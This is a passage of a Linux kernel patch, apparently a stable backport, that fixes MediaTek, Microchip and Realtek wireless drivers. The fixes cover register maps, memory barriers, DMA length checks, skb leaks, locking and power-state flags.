+ 	int ret;
+ 
+-	ret = mt76_mcu_send_and_get_msg(&dev->mt76, MCU_WM_UNI_CMD_QUERY(EFUSE_CTRL), &req,
+-					sizeof(req), true, &skb);
++	ret = mt76_mcu_send_and_get_msg(&dev->mt76,
++					MCU_WM_UNI_CMD_QUERY(EFUSE_CTRL),
++					&req, sizeof(req), true, &skb);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/mmio.c b/drivers/net/wireless/mediatek/mt76/mt7996/mmio.c
+index 521769eb6b0e9..d8a2c1a744b25 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/mmio.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/mmio.c
+@@ -21,6 +21,7 @@ static const struct __base mt7996_reg_base[] = {
+ 	[WF_ETBF_BASE]		= { { 0x820ea000, 0x820fa000, 0x830ea000 } },
+ 	[WF_LPON_BASE]		= { { 0x820eb000, 0x820fb000, 0x830eb000 } },
+ 	[WF_MIB_BASE]		= { { 0x820ed000, 0x820fd000, 0x830ed000 } },
++	[WF_RATE_BASE]		= { { 0x820ee000, 0x820fe000, 0x830ee000 } },
+ };
+ 
+ static const struct __map mt7996_reg_map[] = {
+@@ -149,7 +150,7 @@ static u32 __mt7996_reg_addr(struct mt7996_dev *dev, u32 addr)
+ 
+ 	if (dev_is_pci(dev->mt76.dev) &&
+ 	    ((addr >= MT_CBTOP1_PHY_START && addr <= MT_CBTOP1_PHY_END) ||
+-	     (addr >= MT_CBTOP2_PHY_START && addr <= MT_CBTOP2_PHY_END)))
++	    addr >= MT_CBTOP2_PHY_START))
+ 		return mt7996_reg_map_l1(dev, addr);
+ 
+ 	/* CONN_INFRA: covert to phyiscal addr and use layer 1 remap */
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7996/regs.h b/drivers/net/wireless/mediatek/mt76/mt7996/regs.h
+index 794f61b93a466..7a28cae34e34b 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7996/regs.h
++++ b/drivers/net/wireless/mediatek/mt76/mt7996/regs.h
+@@ -33,6 +33,7 @@ enum base_rev {
+ 	WF_ETBF_BASE,
+ 	WF_LPON_BASE,
+ 	WF_MIB_BASE,
++	WF_RATE_BASE,
+ 	__MT_REG_BASE_MAX,
+ };
+ 
+@@ -235,13 +236,6 @@ enum base_rev {
+ 						 FIELD_PREP(MT_WTBL_LMAC_ID, _id) | \
+ 						 FIELD_PREP(MT_WTBL_LMAC_DW, _dw))
+ 
+-/* AGG: band 0(0x820e2000), band 1(0x820f2000), band 2(0x830e2000) */
+-#define MT_WF_AGG_BASE(_band)			__BASE(WF_AGG_BASE, (_band))
+-#define MT_WF_AGG(_band, ofs)			(MT_WF_AGG_BASE(_band) + (ofs))
+-
+-#define MT_AGG_ACR0(_band)			MT_WF_AGG(_band, 0x054)
+-#define MT_AGG_ACR_CFEND_RATE			GENMASK(13, 0)
+-
+ /* ARB: band 0(0x820e3000), band 1(0x820f3000), band 2(0x830e3000) */
+ #define MT_WF_ARB_BASE(_band)			__BASE(WF_ARB_BASE, (_band))
+ #define MT_WF_ARB(_band, ofs)			(MT_WF_ARB_BASE(_band) + (ofs))
+@@ -300,6 +294,13 @@ enum base_rev {
+ #define MT_WF_RMAC_RSVD0(_band)			MT_WF_RMAC(_band, 0x03e0)
+ #define MT_WF_RMAC_RSVD0_EIFS_CLR		BIT(21)
+ 
++/* RATE: band 0(0x820ee000), band 1(0x820fe000), band 2(0x830ee000) */
++#define MT_WF_RATE_BASE(_band)			__BASE(WF_RATE_BASE, (_band))
++#define MT_WF_RATE(_band, ofs)			(MT_WF_RATE_BASE(_band) + (ofs))
++
++#define MT_RATE_HRCR0(_band)			MT_WF_RATE(_band, 0x050)
++#define MT_RATE_HRCR0_CFEND_RATE		GENMASK(14, 0)
++
+ /* WFDMA0 */
+ #define MT_WFDMA0_BASE				0xd4000
+ #define MT_WFDMA0(ofs)				(MT_WFDMA0_BASE + (ofs))
+@@ -463,7 +464,6 @@ enum base_rev {
+ #define MT_CBTOP1_PHY_START			0x70000000
+ #define MT_CBTOP1_PHY_END			0x77ffffff
+ #define MT_CBTOP2_PHY_START			0xf0000000
+-#define MT_CBTOP2_PHY_END			0xffffffff
+ #define MT_INFRA_MCU_START			0x7c000000
+ #define MT_INFRA_MCU_END			0x7c3fffff
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/sdio.c b/drivers/net/wireless/mediatek/mt76/sdio.c
+index 228bc7d45011c..419723118ded8 100644
+--- a/drivers/net/wireless/mediatek/mt76/sdio.c
++++ b/drivers/net/wireless/mediatek/mt76/sdio.c
+@@ -562,6 +562,10 @@ mt76s_tx_queue_skb_raw(struct mt76_dev *dev, struct mt76_queue *q,
+ 
+ 	q->entry[q->head].buf_sz = len;
+ 	q->entry[q->head].skb = skb;
++
++	/* ensure the entry fully updated before bus access */
++	smp_wmb();
++
+ 	q->head = (q->head + 1) % q->ndesc;
+ 	q->queued++;
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/sdio_txrx.c b/drivers/net/wireless/mediatek/mt76/sdio_txrx.c
+index bfc4de50a4d23..ddd8c0cc744df 100644
+--- a/drivers/net/wireless/mediatek/mt76/sdio_txrx.c
++++ b/drivers/net/wireless/mediatek/mt76/sdio_txrx.c
+@@ -254,6 +254,10 @@ static int mt76s_tx_run_queue(struct mt76_dev *dev, struct mt76_queue *q)
+ 
+ 		if (!test_bit(MT76_STATE_MCU_RUNNING, &dev->phy.state)) {
+ 			__skb_put_zero(e->skb, 4);
++			err = __skb_grow(e->skb, roundup(e->skb->len,
++							 sdio->func->cur_blksize));
++			if (err)
++				return err;
+ 			err = __mt76s_xmit_queue(dev, e->skb->data,
+ 						 e->skb->len);
+ 			if (err)
+diff --git a/drivers/net/wireless/mediatek/mt7601u/dma.c b/drivers/net/wireless/mediatek/mt7601u/dma.c
+index 457147394edc4..773a1cc2f8520 100644
+--- a/drivers/net/wireless/mediatek/mt7601u/dma.c
++++ b/drivers/net/wireless/mediatek/mt7601u/dma.c
+@@ -123,7 +123,8 @@ static u16 mt7601u_rx_next_seg_len(u8 *data, u32 data_len)
+ 	if (data_len < min_seg_len ||
+ 	    WARN_ON_ONCE(!dma_len) ||
+ 	    WARN_ON_ONCE(dma_len + MT_DMA_HDRS > data_len) ||
+-	    WARN_ON_ONCE(dma_len & 0x3))
++	    WARN_ON_ONCE(dma_len & 0x3) ||
++	    WARN_ON_ONCE(dma_len < min_seg_len))
+ 		return 0;
+ 
+ 	return MT_DMA_HDRS + dma_len;
+diff --git a/drivers/net/wireless/microchip/wilc1000/netdev.c b/drivers/net/wireless/microchip/wilc1000/netdev.c
+index 9b319a455b96d..e9f59de31b0b9 100644
+--- a/drivers/net/wireless/microchip/wilc1000/netdev.c
++++ b/drivers/net/wireless/microchip/wilc1000/netdev.c
+@@ -730,6 +730,7 @@ netdev_tx_t wilc_mac_xmit(struct sk_buff *skb, struct net_device *ndev)
+ 
+ 	if (skb->dev != ndev) {
+ 		netdev_err(ndev, "Packet not destined to this device\n");
++		dev_kfree_skb(skb);
+ 		return NETDEV_TX_OK;
+ 	}
+ 
+@@ -980,7 +981,7 @@ struct wilc_vif *wilc_netdev_ifc_init(struct wilc *wl, const char *name,
+ 						    ndev->name);
+ 	if (!wl->hif_workqueue) {
+ 		ret = -ENOMEM;
+-		goto error;
++		goto unregister_netdev;
+ 	}
+ 
+ 	ndev->needs_free_netdev = true;
+@@ -995,6 +996,11 @@ struct wilc_vif *wilc_netdev_ifc_init(struct wilc *wl, const char *name,
+ 
+ 	return vif;
+ 
++unregister_netdev:
++	if (rtnl_locked)
++		cfg80211_unregister_netdevice(ndev);
++	else
++		unregister_netdev(ndev);
+   error:
+ 	free_netdev(ndev);
+ 	return ERR_PTR(ret);
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8188f.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8188f.c
+index 2c4f403ba68f3..97e7ff7289fab 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8188f.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8188f.c
+@@ -1122,7 +1122,7 @@ static void rtl8188fu_phy_iqcalibrate(struct rtl8xxxu_priv *priv,
+ 
+ 	if (t == 0) {
+ 		val32 = rtl8xxxu_read32(priv, REG_FPGA0_XA_HSSI_PARM1);
+-		priv->pi_enabled = val32 & FPGA0_HSSI_PARM1_PI;
++		priv->pi_enabled = u32_get_bits(val32, FPGA0_HSSI_PARM1_PI);
+ 	}
+ 
+ 	/* save RF path */
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
+index a7d76693c02db..9d0ed6760cb61 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
+@@ -1744,6 +1744,11 @@ static void rtl8192e_enable_rf(struct rtl8xxxu_priv *priv)
+ 	val8 = rtl8xxxu_read8(priv, REG_PAD_CTRL1);
+ 	val8 &= ~BIT(0);
+ 	rtl8xxxu_write8(priv, REG_PAD_CTRL1, val8);
++
++	/*
++	 * Fix transmission failure of rtl8192e.
++	 */
++	rtl8xxxu_write8(priv, REG_TXPAUSE, 0x00);
+ }
+ 
+ static s8 rtl8192e_cck_rssi(struct rtl8xxxu_priv *priv, u8 cck_agc_rpt)
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+index 3ed435401e570..d22990464dad6 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_core.c
+@@ -4208,10 +4208,12 @@ static int rtl8xxxu_init_device(struct ieee80211_hw *hw)
+ 		 * should be equal or CCK RSSI report may be incorrect
+ 		 */
+ 		val32 = rtl8xxxu_read32(priv, REG_FPGA0_XA_HSSI_PARM2);
+-		priv->cck_agc_report_type = val32 & FPGA0_HSSI_PARM2_CCK_HIGH_PWR;
++		priv->cck_agc_report_type =
++			u32_get_bits(val32, FPGA0_HSSI_PARM2_CCK_HIGH_PWR);
+ 
+ 		val32 = rtl8xxxu_read32(priv, REG_FPGA0_XB_HSSI_PARM2);
+-		if (priv->cck_agc_report_type != (bool)(val32 & FPGA0_HSSI_PARM2_CCK_HIGH_PWR)) {
++		if (priv->cck_agc_report_type !=
++		    u32_get_bits(val32, FPGA0_HSSI_PARM2_CCK_HIGH_PWR)) {
+ 			if (priv->cck_agc_report_type)
+ 				val32 |= FPGA0_HSSI_PARM2_CCK_HIGH_PWR;
+ 			else
+@@ -5274,7 +5276,7 @@ static void rtl8xxxu_queue_rx_urb(struct rtl8xxxu_priv *priv,
+ 		pending = priv->rx_urb_pending_count;
+ 	} else {
+ 		skb = (struct sk_buff *)rx_urb->urb.context;
+-		dev_kfree_skb(skb);
++		dev_kfree_skb_irq(skb);
+ 		usb_free_urb(&rx_urb->urb);
+ 	}
+ 
+@@ -5550,9 +5552,6 @@ static void rtl8xxxu_c2hcmd_callback(struct work_struct *work)
+ 	btcoex = &priv->bt_coex;
+ 	rarpt = &priv->ra_report;
+ 
+-	if (priv->rf_paths > 1)
+-		goto out;
+-
+ 	while (!skb_queue_empty(&priv->c2hcmd_queue)) {
+ 		skb = skb_dequeue(&priv->c2hcmd_queue);
+ 
+@@ -5585,10 +5584,9 @@ static void rtl8xxxu_c2hcmd_callback(struct work_struct *work)
+ 		default:
+ 			break;
+ 		}
+-	}
+ 
+-out:
+-	dev_kfree_skb(skb);
++		dev_kfree_skb(skb);
++	}
+ }
+ 
+ static void rtl8723bu_handle_c2h(struct rtl8xxxu_priv *priv,
+@@ -5956,7 +5954,6 @@ static int rtl8xxxu_config(struct ieee80211_hw *hw, u32 changed)
+ {
+ 	struct rtl8xxxu_priv *priv = hw->priv;
+ 	struct device *dev = &priv->udev->dev;
+-	u16 val16;
+ 	int ret = 0, channel;
+ 	bool ht40;
+ 
+@@ -5966,14 +5963,6 @@ static int rtl8xxxu_config(struct ieee80211_hw *hw, u32 changed)
+ 			 __func__, hw->conf.chandef.chan->hw_value,
+ 			 changed, hw->conf.chandef.width);
+ 
+-	if (changed & IEEE80211_CONF_CHANGE_RETRY_LIMITS) {
+-		val16 = ((hw->conf.long_frame_max_tx_count <<
+-			  RETRY_LIMIT_LONG_SHIFT) & RETRY_LIMIT_LONG_MASK) |
+-			((hw->conf.short_frame_max_tx_count <<
+-			  RETRY_LIMIT_SHORT_SHIFT) & RETRY_LIMIT_SHORT_MASK);
+-		rtl8xxxu_write16(priv, REG_RETRY_LIMIT, val16);
+-	}
+-
+ 	if (changed & IEEE80211_CONF_CHANGE_CHANNEL) {
+ 		switch (hw->conf.chandef.width) {
+ 		case NL80211_CHAN_WIDTH_20_NOHT:
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/hw.c b/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/hw.c
+index 58c2ab3d44bef..de61c9c0ddec4 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/hw.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8188ee/hw.c
+@@ -68,8 +68,10 @@ static void _rtl88ee_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 	struct rtl_priv *rtlpriv = rtl_priv(hw);
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	struct rtl8192_tx_ring *ring = &rtlpci->tx_ring[BEACON_QUEUE];
++	struct sk_buff_head free_list;
+ 	unsigned long flags;
+ 
++	skb_queue_head_init(&free_list);
+ 	spin_lock_irqsave(&rtlpriv->locks.irq_th_lock, flags);
+ 	while (skb_queue_len(&ring->queue)) {
+ 		struct rtl_tx_desc *entry = &ring->desc[ring->idx];
+@@ -79,10 +81,12 @@ static void _rtl88ee_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 				 rtlpriv->cfg->ops->get_desc(hw, (u8 *)entry,
+ 						true, HW_DESC_TXBUFF_ADDR),
+ 				 skb->len, DMA_TO_DEVICE);
+-		kfree_skb(skb);
++		__skb_queue_tail(&free_list, skb);
+ 		ring->idx = (ring->idx + 1) % ring->entries;
+ 	}
+ 	spin_unlock_irqrestore(&rtlpriv->locks.irq_th_lock, flags);
++
++	__skb_queue_purge(&free_list);
+ }
+ 
+ static void _rtl88ee_disable_bcn_sub_func(struct ieee80211_hw *hw)
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8723be/hw.c b/drivers/net/wireless/realtek/rtlwifi/rtl8723be/hw.c
+index 189cc6437600f..0ba3bbed6ed36 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8723be/hw.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8723be/hw.c
+@@ -30,8 +30,10 @@ static void _rtl8723be_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 	struct rtl_priv *rtlpriv = rtl_priv(hw);
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	struct rtl8192_tx_ring *ring = &rtlpci->tx_ring[BEACON_QUEUE];
++	struct sk_buff_head free_list;
+ 	unsigned long flags;
+ 
++	skb_queue_head_init(&free_list);
+ 	spin_lock_irqsave(&rtlpriv->locks.irq_th_lock, flags);
+ 	while (skb_queue_len(&ring->queue)) {
+ 		struct rtl_tx_desc *entry = &ring->desc[ring->idx];
+@@ -41,10 +43,12 @@ static void _rtl8723be_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 				 rtlpriv->cfg->ops->get_desc(hw, (u8 *)entry,
+ 						true, HW_DESC_TXBUFF_ADDR),
+ 				 skb->len, DMA_TO_DEVICE);
+-		kfree_skb(skb);
++		__skb_queue_tail(&free_list, skb);
+ 		ring->idx = (ring->idx + 1) % ring->entries;
+ 	}
+ 	spin_unlock_irqrestore(&rtlpriv->locks.irq_th_lock, flags);
++
++	__skb_queue_purge(&free_list);
+ }
+ 
+ static void _rtl8723be_set_bcn_ctrl_reg(struct ieee80211_hw *hw,
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/hw.c b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/hw.c
+index 7e0f62d59fe17..a7e3250957dc9 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/hw.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/hw.c
+@@ -26,8 +26,10 @@ static void _rtl8821ae_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 	struct rtl_priv *rtlpriv = rtl_priv(hw);
+ 	struct rtl_pci *rtlpci = rtl_pcidev(rtl_pcipriv(hw));
+ 	struct rtl8192_tx_ring *ring = &rtlpci->tx_ring[BEACON_QUEUE];
++	struct sk_buff_head free_list;
+ 	unsigned long flags;
+ 
++	skb_queue_head_init(&free_list);
+ 	spin_lock_irqsave(&rtlpriv->locks.irq_th_lock, flags);
+ 	while (skb_queue_len(&ring->queue)) {
+ 		struct rtl_tx_desc *entry = &ring->desc[ring->idx];
+@@ -37,10 +39,12 @@ static void _rtl8821ae_return_beacon_queue_skb(struct ieee80211_hw *hw)
+ 				 rtlpriv->cfg->ops->get_desc(hw, (u8 *)entry,
+ 						true, HW_DESC_TXBUFF_ADDR),
+ 				 skb->len, DMA_TO_DEVICE);
+-		kfree_skb(skb);
++		__skb_queue_tail(&free_list, skb);
+ 		ring->idx = (ring->idx + 1) % ring->entries;
+ 	}
+ 	spin_unlock_irqrestore(&rtlpriv->locks.irq_th_lock, flags);
++
++	__skb_queue_purge(&free_list);
+ }
+ 
+ static void _rtl8821ae_set_bcn_ctrl_reg(struct ieee80211_hw *hw,
+diff --git a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c
+index a29321e2fa72f..5323ead30db03 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c
++++ b/drivers/net/wireless/realtek/rtlwifi/rtl8821ae/phy.c
+@@ -1598,18 +1598,6 @@ static bool _rtl8812ae_get_integer_from_string(const char *str, u8 *pint)
+ 	return true;
+ }
+ 
+-static bool _rtl8812ae_eq_n_byte(const char *str1, const char *str2, u32 num)
+-{
+-	if (num == 0)
+-		return false;
+-	while (num > 0) {
+-		num--;
+-		if (str1[num] != str2[num])
+-			return false;
+-	}
+-	return true;
+-}
+-
+ static s8 _rtl8812ae_phy_get_chnl_idx_of_txpwr_lmt(struct ieee80211_hw *hw,
+ 					      u8 band, u8 channel)
+ {
+@@ -1659,42 +1647,42 @@ static void _rtl8812ae_phy_set_txpower_limit(struct ieee80211_hw *hw,
+ 	power_limit = power_limit > MAX_POWER_INDEX ?
+ 		      MAX_POWER_INDEX : power_limit;
+ 
+-	if (_rtl8812ae_eq_n_byte(pregulation, "FCC", 3))
++	if (strcmp(pregulation, "FCC") == 0)
+ 		regulation = 0;
+-	else if (_rtl8812ae_eq_n_byte(pregulation, "MKK", 3))
++	else if (strcmp(pregulation, "MKK") == 0)
+ 		regulation = 1;
+-	else if (_rtl8812ae_eq_n_byte(pregulation, "ETSI", 4))
++	else if (strcmp(pregulation, "ETSI") == 0)
+ 		regulation = 2;
+-	else if (_rtl8812ae_eq_n_byte(pregulation, "WW13", 4))
++	else if (strcmp(pregulation, "WW13") == 0)
+ 		regulation = 3;
+ 
+-	if (_rtl8812ae_eq_n_byte(prate_section, "CCK", 3))
++	if (strcmp(prate_section, "CCK") == 0)
+ 		rate_section = 0;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "OFDM", 4))
++	else if (strcmp(prate_section, "OFDM") == 0)
+ 		rate_section = 1;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "HT", 2) &&
+-		 _rtl8812ae_eq_n_byte(prf_path, "1T", 2))
++	else if (strcmp(prate_section, "HT") == 0 &&
++		 strcmp(prf_path, "1T") == 0)
+ 		rate_section = 2;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "HT", 2) &&
+-		 _rtl8812ae_eq_n_byte(prf_path, "2T", 2))
++	else if (strcmp(prate_section, "HT") == 0 &&
++		 strcmp(prf_path, "2T") == 0)
+ 		rate_section = 3;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "VHT", 3) &&
+-		 _rtl8812ae_eq_n_byte(prf_path, "1T", 2))
++	else if (strcmp(prate_section, "VHT") == 0 &&
++		 strcmp(prf_path, "1T") == 0)
+ 		rate_section = 4;
+-	else if (_rtl8812ae_eq_n_byte(prate_section, "VHT", 3) &&
+-		 _rtl8812ae_eq_n_byte(prf_path, "2T", 2))
++	else if (strcmp(prate_section, "VHT") == 0 &&
++		 strcmp(prf_path, "2T") == 0)
+ 		rate_section = 5;
+ 
+-	if (_rtl8812ae_eq_n_byte(pbandwidth, "20M", 3))
++	if (strcmp(pbandwidth, "20M") == 0)
+ 		bandwidth = 0;
+-	else if (_rtl8812ae_eq_n_byte(pbandwidth, "40M", 3))
++	else if (strcmp(pbandwidth, "40M") == 0)
+ 		bandwidth = 1;
+-	else if (_rtl8812ae_eq_n_byte(pbandwidth, "80M", 3))
++	else if (strcmp(pbandwidth, "80M") == 0)
+ 		bandwidth = 2;
+-	else if (_rtl8812ae_eq_n_byte(pbandwidth, "160M", 4))
++	else if (strcmp(pbandwidth, "160M") == 0)
+ 		bandwidth = 3;
+ 
+-	if (_rtl8812ae_eq_n_byte(pband, "2.4G", 4)) {
++	if (strcmp(pband, "2.4G") == 0) {
+ 		ret = _rtl8812ae_phy_get_chnl_idx_of_txpwr_lmt(hw,
+ 							       BAND_ON_2_4G,
+ 							       channel);
+@@ -1718,7 +1706,7 @@ static void _rtl8812ae_phy_set_txpower_limit(struct ieee80211_hw *hw,
+ 			regulation, bandwidth, rate_section, channel_index,
+ 			rtlphy->txpwr_limit_2_4g[regulation][bandwidth]
+ 				[rate_section][channel_index][RF90_PATH_A]);
+-	} else if (_rtl8812ae_eq_n_byte(pband, "5G", 2)) {
++	} else if (strcmp(pband, "5G") == 0) {
+ 		ret = _rtl8812ae_phy_get_chnl_idx_of_txpwr_lmt(hw,
+ 							       BAND_ON_5G,
+ 							       channel);
+diff --git a/drivers/net/wireless/realtek/rtw88/coex.c b/drivers/net/wireless/realtek/rtw88/coex.c
+index 38697237ee5f0..86467d2f8888c 100644
+--- a/drivers/net/wireless/realtek/rtw88/coex.c
++++ b/drivers/net/wireless/realtek/rtw88/coex.c
+@@ -4056,7 +4056,7 @@ void rtw_coex_display_coex_info(struct rtw_dev *rtwdev, struct seq_file *m)
+ 		   rtwdev->stats.tx_throughput, rtwdev->stats.rx_throughput);
+ 	seq_printf(m, "%-40s = %u/ %u/ %u\n",
+ 		   "IPS/ Low Power/ PS mode",
+-		   test_bit(RTW_FLAG_INACTIVE_PS, rtwdev->flags),
++		   !test_bit(RTW_FLAG_POWERON, rtwdev->flags),
+ 		   test_bit(RTW_FLAG_LEISURE_PS_DEEP, rtwdev->flags),
+ 		   rtwdev->lps_conf.mode);
+ 
+diff --git a/drivers/net/wireless/realtek/rtw88/mac.c b/drivers/net/wireless/realtek/rtw88/mac.c
+index 98777f294945f..aa7c5901ef260 100644
+--- a/drivers/net/wireless/realtek/rtw88/mac.c
++++ b/drivers/net/wireless/realtek/rtw88/mac.c
+@@ -273,6 +273,11 @@ static int rtw_mac_power_switch(struct rtw_dev *rtwdev, bool pwr_on)
+ 	if (rtw_pwr_seq_parser(rtwdev, pwr_seq))
+ 		return -EINVAL;
+ 
++	if (pwr_on)
++		set_bit(RTW_FLAG_POWERON, rtwdev->flags);
++	else
++		clear_bit(RTW_FLAG_POWERON, rtwdev->flags);
++
+ 	return 0;
+ }
+ 
+@@ -335,6 +340,11 @@ int rtw_mac_power_on(struct rtw_dev *rtwdev)
+ 	ret = rtw_mac_power_switch(rtwdev, true);
+ 	if (ret == -EALREADY) {
+ 		rtw_mac_power_switch(rtwdev, false);
++
++		ret = rtw_mac_pre_system_cfg(rtwdev);
++		if (ret)
++			goto err;
++
+ 		ret = rtw_mac_power_switch(rtwdev, true);
+ 		if (ret)
+ 			goto err;
+diff --git a/drivers/net/wireless/realtek/rtw88/mac80211.c b/drivers/net/wireless/realtek/rtw88/mac80211.c
+index 776a9a9884b5d..3b92ac611d3fd 100644
+--- a/drivers/net/wireless/realtek/rtw88/mac80211.c
++++ b/drivers/net/wireless/realtek/rtw88/mac80211.c
+@@ -737,7 +737,7 @@ static void rtw_ra_mask_info_update(struct rtw_dev *rtwdev,
+ 	br_data.rtwdev = rtwdev;
+ 	br_data.vif = vif;
+ 	br_data.mask = mask;
+-	rtw_iterate_stas_atomic(rtwdev, rtw_ra_mask_info_update_iter, &br_data);
++	rtw_iterate_stas(rtwdev, rtw_ra_mask_info_update_iter, &br_data);
+ }
+ 
+ static int rtw_ops_set_bitrate_mask(struct ieee80211_hw *hw,
+@@ -746,7 +746,9 @@ static int rtw_ops_set_bitrate_mask(struct ieee80211_hw *hw,
+ {
+ 	struct rtw_dev *rtwdev = hw->priv;
+ 
++	mutex_lock(&rtwdev->mutex);
+ 	rtw_ra_mask_info_update(rtwdev, vif, mask);
++	mutex_unlock(&rtwdev->mutex);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/net/wireless/realtek/rtw88/main.c b/drivers/net/wireless/realtek/rtw88/main.c
+index 888427cf3bdf9..b2e78737bd5d0 100644
+--- a/drivers/net/wireless/realtek/rtw88/main.c
++++ b/drivers/net/wireless/realtek/rtw88/main.c
+@@ -241,8 +241,10 @@ static void rtw_watch_dog_work(struct work_struct *work)
+ 	rtw_phy_dynamic_mechanism(rtwdev);
+ 
+ 	data.rtwdev = rtwdev;
+-	/* use atomic version to avoid taking local->iflist_mtx mutex */
+-	rtw_iterate_vifs_atomic(rtwdev, rtw_vif_watch_dog_iter, &data);
++	/* rtw_iterate_vifs internally uses an atomic iterator which is needed
++	 * to avoid taking local->iflist_mtx mutex
++	 */
++	rtw_iterate_vifs(rtwdev, rtw_vif_watch_dog_iter, &data);
+ 
+ 	/* fw supports only one station associated to enter lps, if there are
+ 	 * more than two stations associated to the AP, then we can not enter
+diff --git a/drivers/net/wireless/realtek/rtw88/main.h b/drivers/net/wireless/realtek/rtw88/main.h
+index 165f299e8e1f9..d4a53d5567451 100644
+--- a/drivers/net/wireless/realtek/rtw88/main.h
++++ b/drivers/net/wireless/realtek/rtw88/main.h
+@@ -356,7 +356,7 @@ enum rtw_flags {
+ 	RTW_FLAG_RUNNING,
+ 	RTW_FLAG_FW_RUNNING,
+ 	RTW_FLAG_SCANNING,
+-	RTW_FLAG_INACTIVE_PS,
++	RTW_FLAG_POWERON,
+ 	RTW_FLAG_LEISURE_PS,
+ 	RTW_FLAG_LEISURE_PS_DEEP,
+ 	RTW_FLAG_DIG_DISABLE,
+diff --git a/drivers/net/wireless/realtek/rtw88/ps.c b/drivers/net/wireless/realtek/rtw88/ps.c
+index 11594940d6b00..996365575f44f 100644
+--- a/drivers/net/wireless/realtek/rtw88/ps.c
++++ b/drivers/net/wireless/realtek/rtw88/ps.c
+@@ -25,7 +25,7 @@ static int rtw_ips_pwr_up(struct rtw_dev *rtwdev)
+ 
+ int rtw_enter_ips(struct rtw_dev *rtwdev)
+ {
+-	if (test_and_set_bit(RTW_FLAG_INACTIVE_PS, rtwdev->flags))
++	if (!test_bit(RTW_FLAG_POWERON, rtwdev->flags))
+ 		return 0;
+ 
+ 	rtw_coex_ips_notify(rtwdev, COEX_IPS_ENTER);
+@@ -50,7 +50,7 @@ int rtw_leave_ips(struct rtw_dev *rtwdev)
+ {
+ 	int ret;
+ 
+-	if (!test_and_clear_bit(RTW_FLAG_INACTIVE_PS, rtwdev->flags))
++	if (test_bit(RTW_FLAG_POWERON, rtwdev->flags))
+ 		return 0;
+ 
+ 	rtw_hci_link_ps(rtwdev, false);
+diff --git a/drivers/net/wireless/realtek/rtw88/wow.c b/drivers/net/wireless/realtek/rtw88/wow.c
+index 89dc595094d5c..16ddee577efec 100644
+--- a/drivers/net/wireless/realtek/rtw88/wow.c
++++ b/drivers/net/wireless/realtek/rtw88/wow.c
+@@ -592,7 +592,7 @@ static int rtw_wow_leave_no_link_ps(struct rtw_dev *rtwdev)
+ 		if (rtw_get_lps_deep_mode(rtwdev) != LPS_DEEP_MODE_NONE)
+ 			rtw_leave_lps_deep(rtwdev);
+ 	} else {
+-		if (test_bit(RTW_FLAG_INACTIVE_PS, rtwdev->flags)) {
++		if (!test_bit(RTW_FLAG_POWERON, rtwdev->flags)) {
+ 			rtw_wow->ips_enabled = true;
+ 			ret = rtw_leave_ips(rtwdev);
+ 			if (ret)
+diff --git a/drivers/net/wireless/realtek/rtw89/core.c b/drivers/net/wireless/realtek/rtw89/core.c
+index 931aff8b5dc95..e99eccf11c762 100644
+--- a/drivers/net/wireless/realtek/rtw89/core.c
++++ b/drivers/net/wireless/realtek/rtw89/core.c
+@@ -3124,6 +3124,8 @@ int rtw89_core_init(struct rtw89_dev *rtwdev)
+ 	INIT_DELAYED_WORK(&rtwdev->cfo_track_work, rtw89_phy_cfo_track_work);
+ 	INIT_DELAYED_WORK(&rtwdev->forbid_ba_work, rtw89_forbid_ba_work);
+ 	rtwdev->txq_wq = alloc_workqueue("rtw89_tx_wq", WQ_UNBOUND | WQ_HIGHPRI, 0);
++	if (!rtwdev->txq_wq)
++		return -ENOMEM;
+ 	spin_lock_init(&rtwdev->ba_lock);
+ 	spin_lock_init(&rtwdev->rpwm_lock);
